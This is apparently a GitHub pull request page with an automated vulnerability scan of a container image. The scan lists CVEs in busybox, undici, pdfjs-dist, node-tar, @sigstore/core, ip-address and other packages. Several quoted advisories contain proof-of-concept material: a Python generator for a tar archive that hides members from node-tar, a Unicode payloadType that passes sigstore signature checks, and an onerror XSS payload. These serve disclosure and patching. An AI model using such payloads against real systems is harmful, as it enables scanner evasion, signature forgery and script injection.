FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&distro=wolfi-20230201

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

high : CVE--2023--39810

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.710%
EPSS Percentile49th percentile
Description

high : CVE--2026--26158

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.160%
EPSS Percentile6th percentile
Description

high : CVE--2026--26157

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.682%
EPSS Percentile48th percentile
Description
critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

high : CVE--2023--39810

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.710%
EPSS Percentile49th percentile
Description

high : CVE--2026--26158

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.160%
EPSS Percentile6th percentile
Description

high : CVE--2026--26157

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.682%
EPSS Percentile48th percentile
Description
critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&origin=busybox

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

high : CVE--2023--39810

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.710%
EPSS Percentile49th percentile
Description

high : CVE--2026--26158

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.160%
EPSS Percentile6th percentile
Description

high : CVE--2026--26157

Affected range<1.37.0-r58
Fixed version1.37.0-r58
EPSS Score0.682%
EPSS Percentile48th percentile
Description
critical: 0 high: 1 medium: 1 low: 2 undici 6.25.0 (npm)

pkg:npm/undici@6.25.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 7.5: CVE--2026--12151 Uncontrolled Resource Consumption

Affected range<6.27.0
Fixed version6.27.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.570%
EPSS Percentile43rd percentile
Description

Impact

The undici WebSocket client enforces maxPayloadSize on the cumulative byte count of fragments in a message but does not enforce a limit on the number of fragments. A malicious WebSocket server can stream many small or empty continuation frames that each pass per-frame and cumulative-size validation, collectively causing unbounded memory growth in the client process. The result is memory exhaustion and a denial of service.

Affected applications are those using the undici WebSocket client (new WebSocket(...)) or the WebSocketStream API that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.

All releases starting at undici 6.17.0 are affected.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

No workaround is available. The fix must be applied through an upgrade.

medium 5.9: CVE--2026--9679 Improper Neutralization of CRLF Sequences ('CRLF Injection')

Affected range<6.27.0
Fixed version6.27.0
CVSS Score5.9
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score0.257%
EPSS Percentile17th percentile
Description

Impact

undici's cookie parser in parseSetCookie percent-decodes cookie values via qsUnescape, turning encoded sequences like %0D%0A, %00, %3B, and %3D into their literal byte equivalents. RFC 6265 §5.4 does not specify any decoding and browsers do not decode either.

Applications that parse a Set-Cookie header and then forward the parsed value into a response header (proxies, middleware, SSR frameworks) become vulnerable to HTTP response header injection: an attacker-controlled upstream can inject arbitrary Set-Cookie, Location, or Cache-Control headers into the application's downstream response, enabling session fixation, open redirect, or cache poisoning.

Affected applications are those that use undici's cookie parsing (parseSetCookie, parseCookie, getSetCookies) and forward the parsed cookie value into a response header.

This was introduced in undici 7.0.0 via #3789.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

If upgrade is not immediately possible, do not forward values returned by parseSetCookie/parseCookie/getSetCookies directly into response headers; sanitize the value first to strip or reject CR, LF, NUL, ;, and = bytes.

low 3.7: CVE--2026--6733 Time-of-check Time-of-use (TOCTOU) Race Condition

Affected range<6.27.0
Fixed version6.27.0
CVSS Score3.7
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score0.228%
EPSS Percentile13th percentile
Description

Impact

Undici's HTTP/1.1 client is vulnerable to response queue poisoning on reused keep-alive sockets. An attacker-controlled upstream server can inject an unsolicited HTTP/1.1 response onto an idle socket after a request completes. When the client dispatches the next request on that socket, it associates the injected response with the new request, causing responses to be delivered to the wrong requests.

This requires an attacker-controlled or compromised upstream HTTP/1.1 server and keep-alive connection reuse.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

Disable keep-alive connection reuse by setting keepAliveTimeout: 0 on the Client or Pool.

low 3.7: CVE--2026--11525 Permissive List of Allowed Inputs

Affected range<6.27.0
Fixed version6.27.0
CVSS Score3.7
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score0.248%
EPSS Percentile16th percentile
Description

Impact

When undici parses a Set-Cookie header, it accepts any SameSite attribute value that contains Strict, Lax, or None as a substring, rather than the case-insensitive exact match specified by RFC 6265. Non-spec values are silently mapped to one of the three standard tokens:

  • SameSite=NoneOfYourBusiness is parsed as None, the most permissive setting.
  • SameSite=StrictLax is parsed as Lax, a downgrade from Strict.

Affected applications are those that consume Set-Cookie headers from server responses (for example via undici's fetch or proxy code paths) and then forward or rely on the parsed sameSite attribute. A malicious or non-compliant server can coerce the consumer's view of a cookie's SameSite policy to a weaker value, silently degrading the SameSite enforcement the cookie is supposed to provide.

This was introduced in undici 5.15.0 when the cookies feature was added.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

After parsing a Set-Cookie header, validate that the resulting sameSite attribute is one of 'Strict', 'Lax', or 'None' (exact, case-insensitive) before forwarding or relying on it.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 3.11.174 (npm)

pkg:npm/pdfjs-dist@3.11.174

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 8.8: CVE--2024--4367 Improper Check for Unusual or Exceptional Conditions

Affected range<=4.1.392
Fixed version4.2.67
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score72.648%
EPSS Percentile99th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 0 medium: 1 low: 0 tar 7.5.13 (npm)

pkg:npm/tar@7.5.13

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 6.9: CVE--2026--53655 Interpretation Conflict

Affected range<=7.5.15
Fixed version7.5.16
CVSS Score6.9
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.107%
EPSS Percentile1st percentile
Description

Summary

tar (node-tar) applies a PAX extended header's size= record (and other PAX
overrides) to the next header entry of any type, including intermediary
metadata headers such as a GNU long-name (L) or long-link (K) entry. Per
POSIX pax, a PAX extended header (x) describes the next file entry, not the
intermediary extension headers that may sit between the x header and the file
it annotates. Because node-tar lets the PAX size override the byte length of
an intervening L/K/x header, an attacker can desynchronize node-tar's
stream cursor relative to every other mainstream tar implementation
(GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs /
astral-tokio-tar).

The result is a tar parser interpretation differential (CWE-436): a single
crafted archive yields a different set of members under node-tar than under the
reference tar tools. An attacker can use this to hide a member from one parser
while it is visible to another, which defeats security tooling whose scanner and
extractor disagree on archive contents (e.g. a malware/secret scanner that lists
entries with one library while a downstream step extracts with another). node-tar
is one of the most widely deployed JavaScript tar libraries (it backs npm's own
package-tarball handling and is a transitive dependency of a very large fraction
of the npm ecosystem), so the blast radius for "files that extract differently
depending on the tool" is broad.

This is the same root cause and fix that was just addressed upstream in the Rust
tar ecosystem (tar-rs / astral-tokio-tar); node-tar carries the equivalent
defect and has no equivalent guard.

Impact

  • CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as
    the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and
    GHSA-fp55-jw48-c537).
  • A crafted archive can present one logical member list to a tool that lists or
    scans with node-tar and a different member list to GNU tar / libarchive /
    Python tarfile (and vice versa). This lets a malicious file be hidden from a
    scanner that uses a different parser than the eventual extractor, or hidden
    from node-tar-based inspection while still landing on disk via a system tar.
  • No authentication is required; the only precondition is that a victim parses
    an attacker-supplied tar with node-tar. Tar archives are routinely fetched
    from untrusted sources (package registries, user uploads, CI artifacts,
    container layers).
  • Severity: Medium. Impact is integrity-of-archive-interpretation, not direct
    RCE; it is a building block for supply-chain / scanner-evasion attacks rather
    than a standalone code-execution primitive.

Vulnerable code (file:line)

src/header.ts (compiled to dist/esm/header.js:49 and
dist/commonjs/header.js:85 in the published tar@<!-- -->7.5.15):

// Header.decode(buf, off, ex, gex)
this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)

ex is the currently-accumulated PAX local extended header and gex the
PAX global header. The size override from ex/gex is applied
unconditionally to whatever header is being decoded next — there is no check
that the header being decoded is a real file entry rather than an intermediary
extension header.

src/parse.ts, [CONSUMEHEADER] constructs the next header with the current
EX/GEX applied:

const header = new Header(chunk, position, this[EX], this[GEX])

and later branches on whether that header is a metadata entry. this[EX] is
cleared only in the non-meta (real file) branch:

if (entry.meta) {
  // L / K / x / g metadata entries: this[EX] is left intact here
  if (entry.size > this.maxMetaEntrySize) {
    entry.ignore = true
    this[STATE] = 'ignore'
    entry.resume()
  } else if (entry.size > 0) {
    this[META] = ''
    entry.on('data', c => (this[META] += c))
    this[STATE] = 'meta'
  }
} else {
  this[EX] = undefined   // EX cleared only once a real file entry is reached
}

When the stream is ordered x (PAX, size=N) -> L (GNU long-name) -> file, the
L header is constructed with this[EX] still set, so its size/remain
becomes N instead of the L payload's true length. node-tar then consumes N
bytes of "metadata" and resumes header parsing at the wrong offset, landing
mid-stream. Every other mainstream parser applies the PAX size only to the
following file entry, so they stay synchronized.

The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is
to not apply PAX size/overrides when the entry being decoded is itself an
extension header (L GNU long-name, K GNU long-link, x PAX local, g PAX
global).

How input reaches the sink

tar.list(), tar.extract()/tar.x(), and tar.Parse/tar.Unpack all route
every 512-byte header block through Header.decode(...) with the
currently-accumulated EX/GEX. Any consumer that parses an attacker-supplied
archive — tar.list, tar.extract, or piping into the streaming Parser
reaches the sink. No options need to be enabled; the default code path is
affected.

Proof of concept

Archive layout (all standard, GNU-tar-producible blocks):

block 0 : x  header  (PAX local extended, typeflag 'x'), its own size = len(pax body)
block 1 : x  payload : the single PAX record  "...size=2048\n"
block 2 : L  header  (GNU long-name '././@<!-- -->LongLink'), real size = 13
block 3 : L  payload : "longname.txt\0"      (the long name for the next file)
block 4 : file header 'file_a', size = 16
block 5 : file_a body (16 bytes, zero-padded to 512)
block 6 : file header 'file_b', size = 16
block 7 : file_b body (16 bytes, zero-padded to 512)

Generator (make_tar.py, pure stdlib, no external deps):

def hdr(name, size, typeflag):
    h = bytearray(512); name = name[:100]; h[0:len(name)] = name
    h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
    h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
    h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
    h[148:156] = b' ' * 8
    cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
    return bytes(h)

def pad(d):
    return d + b'\0' * ((512 - len(d) % 512) % 512)

def pax_record(key, val):              # length-prefixed PAX record "LEN key=val\n"
    body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
    while True:
        s = str(n).encode() + body
        if len(s) == n: break
        n = len(s)
    return s

pax = pax_record('size', 2048)         # malicious: claim size=2048 for the "next" entry
out  = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
out += hdr(b'././@<!-- -->LongLink', 13, b'L') + pad(b'longname.txt\0')
out += hdr(b'file_a', 16, b'0')        + pad(b'AAAA_file_a_body')
out += hdr(b'file_b', 16, b'0')        + pad(b'BBBB_file_b_body')
out += b'\0' * 1024
open('pax-desync.tar', 'wb').write(out)

A negative-control archive is identical except the PAX record is
pax_record('comment', 'x') (no size=), written to pax-control.tar.

End-to-end reproduction (against pinned version tar@<!-- -->7.5.15, latest release)

Install the published package into a clean project and parse both archives:

$ npm init -y >/dev/null && npm install tar@<!-- -->7.5.15
$ node -e "console.log(require('tar/package.json').version)"
7.5.15
$ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
49:        this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);

e2e.mjs:

import * as tar from 'tar'
async function listEntries(f){
  const got=[], warns=[]
  await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
                   onwarn:(code,_msg)=>warns.push(code) })
  return { got, warns }
}
const mal = await listEntries('pax-desync.tar')
console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
const ctl = await listEntries('pax-control.tar')
console.log('CONTROL  entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))

Verbatim output:

=== Deployed-consumer E2E: npm tar@<!-- -->7.5.15 (latest release) ===

[MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
  tar.list() entries : []
  tar.list() warnings: ["TAR_ENTRY_INVALID"]

[NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
  tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
  tar.list() warnings: []

Reference parsers on the same pax-desync.tar:

$ tar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # GNU tar

$ bsdtar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # libarchive

$ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
['longname.txt']                                                      # Python tarfile

Interpretation differential: GNU tar, libarchive (bsdtar), and Python tarfile
all extract the member longname.txt from pax-desync.tar, whereas node-tar
7.5.15 desynchronizes, raises TAR_ENTRY_INVALID (checksum failure from
landing mid-stream), and reports zero members. The negative control proves
the divergence is caused solely by the PAX size= override being applied to the
intermediary L header — when the same archive carries a PAX record without
size=, node-tar parses it identically to the reference tools
(longname.txt, file_b).

Suggested fix

When decoding a header, do not apply PAX size (or other PAX overrides) if the
header being decoded is itself an extension header. Concretely, in
src/parse.ts clear/ignore this[EX] (and this[GEX] for size) when the
header's type is ExtendedHeader, GlobalExtendedHeader, NextFileHasLongPath
(GNU L), or NextFileHasLongLinkpath (GNU K); equivalently, in
Header.decode, gate the ex?.size ?? gex?.size override on the decoded type
not being one of those extension types. This mirrors the upstream Rust fix,
which guards pax_size with
is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions.

A fix PR is being prepared against a private fork and will be linked here.

Fix PR

To be linked from a private fork of the repository (the fix will not be pushed
to any public fork or to upstream during embargo).

Credits

Reported by tonghuaroot.

critical: 0 high: 0 medium: 1 low: 0 @sigstore/core 3.2.0 (npm)

pkg:npm/%40sigstore/core@3.2.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 5.4: CVE--2026--48758 Improper Verification of Cryptographic Signature

Affected range<=3.2.0
Fixed version3.2.1
CVSS Score5.4
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Description

Impact

The preAuthEncoding function in @<!-- -->sigstore/core uses Node.js 'ascii' encoding when converting the PAE (Pre-Authentication Encoding) string to bytes. This allows payloadType to be mutated after signing without invalidating the signature, breaking the type-binding guarantee that DSSE is designed to provide.

In packages/core/src/dsse.ts, the PAE function builds a string containing payloadType and then encodes it with Buffer.from(prefix, 'ascii').

In Node.js, 'ascii' encoding for string-to-Buffer is equivalent to 'latin1', which truncates characters above U+00FF to their low byte. This means for any ASCII character, there exist Unicode characters (at U+01xx, U+02xx, etc.) that produce the identical encoded byte:

Original Codepoint Mutant Codepoint Encoded byte
t U+0074 Ŵ U+0174 0x74
e U+0065 ť U+0165 0x65

An attacker can substitute every character in payloadType with a Unicode variant whose low byte matches, producing identical PAE bytes and a passing signature verification.

Additionally, payloadType.length returns the JavaScript string length (UTF-16 code units) rather than the UTF-8 byte length required by the DSSE spec, though this is only a contributing factor for non-ASCII types.

Reproduction

const { preAuthEncoding } = require('@<!-- -->sigstore/core/dist/dsse.js');
const payload = Buffer.from('hello world');

const original = preAuthEncoding('text/plain', payload);
// U+01xx chars whose low bytes match the original ASCII chars
const mutant = preAuthEncoding('\u0174\u0165\u0178\u0174/\u0170\u016c\u0161\u0169\u016e', payload);

console.log('PAE bytes equal:', original.equals(mutant)); // true — should be false
critical: 0 high: 0 medium: 1 low: 0 ip-address 10.1.0 (npm)

pkg:npm/ip-address@10.1.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 5.3: CVE--2026--42338 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected range<=10.1.0
Fixed version10.1.1
CVSS Score5.3
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS Score0.441%
EPSS Percentile35th percentile
Description

Summary

Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. A related issue in v6.helpers.spanAll() produced malformed markup but was not exploitable; it is hardened in the same release for consistency.

Details

Four related issues were identified and fixed together:

  1. Address6.group(): zone ID injection. The Address6 constructor stores the raw input (including any IPv6 zone ID) in this.address before zone stripping. group() then passed this.address to helpers.simpleGroup(), which wrapped each :-separated segment in a <span> element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.
  2. Address6.link({ prefix, className }): attribute-value injection. link() concatenated user-supplied prefix and className into the href="…" and class="…" attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. onmouseover) and achieve XSS.
  3. Address6 constructor: leading-zero IPv4 error path. The leading-zero branch in parse4in6() built AddressError.parseMessage by concatenating the raw address through String.replace(). Because parse4in6() runs before the bad-character check, any characters in the groups preceding the IPv4 suffix flowed into the error's HTML unescaped. Consumers who render parseMessage as HTML (its documented purpose — it already contains <span class="parse-error"> markup) could be XSS'd by a crafted input such as <img src=x onerror=alert(1)>:10.0.01.1.
  4. v6.helpers.spanAll(): attribute-value injection (defense in depth). spanAll() embedded each character of its input into a class="digit value-${n} …" attribute without escaping. Because split('') limits n to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.

Affected Versions

All versions up to and including 10.1.0.

Patched Version

10.1.1.

Impact

Real-world exposure is believed to be extremely limited. Analysis of all 425 dependent npm packages as well as GitHub code search found zero consumers of group(), link(), or spanAll(): these HTML-emitting surfaces appear to be unused across published npm packages and public repositories. Applications using only the address-parsing and comparison APIs (isValid, correctForm, isInSubnet, bigInt, etc.) are not affected.

Consumers who do render the output of group(), link(), spanAll(), or AddressError.parseMessage as HTML against untrusted input should upgrade.

PoC

const { Address6 } = require('ip-address');
const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>');
document.body.innerHTML = addr.group();  // fires the onerror handler in 10.1.0

Workarounds

If users cannot upgrade immediately:

  • Do not pass untrusted input to the Address6 constructor, or
  • Never render the output of group(), link(), or spanAll(), nor the parseMessage field of any thrown AddressError, as HTML; treat these values as text only, or run them through DOMPurify before inserting into the DOM (DOMPurify's default configuration preserves the library's intended <span> wrapping while stripping any injected event handlers), or
  • Validate input with Address6.isValid() and reject anything that contains a zone identifier (a % character) or characters outside [0-9a-fA-F:/] before passing it to the constructor.

Lack of separate CVEs

Given the evidence that these methods are not used, and given that they are all of the same construction, maintainers do not think it's relevant or useful to create a separate CVE for each library method.

Credit

ip-address thanks @scovetta for reporting this issue.

critical: 0 high: 0 medium: 1 low: 0 brace-expansion 5.0.5 (npm)

pkg:npm/brace-expansion@5.0.5

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 6.5: CVE--2026--45149 Uncontrolled Resource Consumption

Affected range>=5.0.0
<5.0.6
Fixed version5.0.6
CVSS Score6.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS Score0.278%
EPSS Percentile19th percentile
Description

The max option was being applied too late:

When expanding a single large numeric range like {1..10000000}, the sequence generation loop generates all 10 million intermediate elements before the max limit is applied With max=10, the output is correctly limited to 10 items, but the process still allocates ~505 MB and spends ~800ms building the full intermediate array.

Workaround

Ensure the string to be expanded doesn't contain more values than the desired max item count.

critical: 0 high: 0 medium: 0 low: 0 unspecified: 11node 24.16.0 (generic)

pkg:generic/node@24.16.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

unspecified : BSA--2026--48937

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48935

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48934

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48933

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48931

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48930

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48928

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48619

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48618

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48617

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

unspecified : BSA--2026--48615

Affected range>=24.0.0
<24.17.0
Fixed version24.17.0
Description

@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:10 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to container_health July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to container_health July 1, 2026 21:11 Failure
@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:12 Inactive
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant